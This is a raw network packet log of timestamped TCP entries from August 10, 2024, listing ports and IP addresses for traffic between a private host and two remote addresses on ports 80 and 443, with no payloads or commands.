Aug 10, 2024 16:12:23.294548035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.295175076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295185089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295193911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295206070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295217037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295227051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295236111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295247078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295258045 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295268059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295288086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295293093 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.295293093 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.295293093 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.295293093 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.295298100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295308113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295309067 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.295317888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.295358896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.295358896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.322597027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.322607994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.322618008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.322650909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.322694063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.322751999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.322762012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.322798014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.322817087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.322828054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.322866917 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.323136091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323146105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323156118 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323165894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323177099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323188066 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.323194981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323213100 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.323246956 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.323360920 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323373079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323381901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323422909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.323436975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323446989 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323456049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323472977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.323483944 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.323635101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323643923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323656082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323688984 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.323781967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323792934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323801994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323812008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323822975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323833942 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.323842049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.323848963 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.323869944 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.324162006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324172974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324182987 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324193954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324206114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324217081 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324223042 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.324248075 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.324439049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324450016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324495077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.324515104 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324525118 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324534893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324563980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.324570894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.324734926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324745893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324757099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324768066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324775934 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.324785948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.324809074 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.324824095 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.324959040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325011969 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.325067997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325078964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325089931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325100899 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325109959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.325119972 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325129986 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.325136900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325144053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.325155020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325169086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.325181007 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.325455904 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325467110 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325476885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325489044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325500965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325511932 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325520992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.325527906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325556040 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.325562000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.325826883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325836897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325846910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325858116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325867891 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325879097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325890064 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.325897932 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.325917006 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.325932980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.326236010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326246977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326256037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326287985 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.326302052 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.326317072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326328039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326337099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326349020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326356888 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.326366901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326378107 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.326384068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326392889 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.326400042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326412916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326425076 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.326438904 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.326448917 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.326457977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326493979 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.326833010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326932907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326942921 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.326950073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.326970100 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.327028036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327038050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327111959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327120066 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.327130079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327162981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.327307940 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327326059 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327352047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327363014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.327368975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327379942 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327387094 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.327395916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327408075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327415943 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.327425003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327435017 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.327442884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327470064 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.327492952 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.327804089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327815056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327825069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327869892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.327955008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327965975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327975035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327986956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.327997923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.328008890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.328017950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.328026056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.328036070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.328051090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.328057051 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.328066111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.328075886 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.328083992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.328094006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.328100920 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.328109026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.328115940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.328128099 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.328131914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.328146935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.328164101 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.328670025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.328680038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.328716040 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.328901052 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.329041958 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.329066992 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.329072952 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.329098940 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.329129934 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.329134941 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.329174042 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.329181910 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.329221010 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.329263926 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.329349995 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.329355001 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.329400063 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.329416990 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.329533100 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.329535007 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.329560041 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.329593897 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.329627037 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.329636097 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.329689026 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.330432892 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.330507994 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.330518961 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.330595016 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.330599070 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.330890894 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.331258059 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.331341028 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.331346989 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.331403017 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.331408024 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.331460953 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.331468105 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.331522942 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.332128048 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.332250118 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.332262039 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.332397938 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.332403898 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.332467079 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.332907915 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.332988024 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.375164986 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.375279903 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.375287056 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.375344992 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.391252995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391264915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391274929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391285896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391297102 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391311884 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.391340017 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391350031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391360998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391511917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.391511917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.391511917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.391519070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391530037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391540051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391551018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391561985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391572952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391585112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391616106 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.391616106 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.391733885 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.391808033 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391819000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391930103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.391958952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391969919 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391979933 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.391990900 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392003059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392014027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392028093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392029047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.392038107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392049074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392050028 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.392060041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392061949 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.392132998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.392309904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392362118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.392394066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392405033 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392414093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392424107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392435074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392445087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392455101 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392492056 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.392492056 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.392492056 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.392682076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392693043 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392730951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392754078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392765045 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392776012 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392785072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392796040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.392796993 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.392796993 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.392796993 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.392838955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.393186092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393197060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393205881 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393214941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393224955 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393235922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393256903 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393265963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393276930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393287897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393299103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393302917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.393302917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.393304110 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.393309116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393318892 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.393693924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.393693924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.393713951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393723965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393733025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393743038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393754005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393764973 CEST	80	49740	147.45.44.104	192.168.2.4
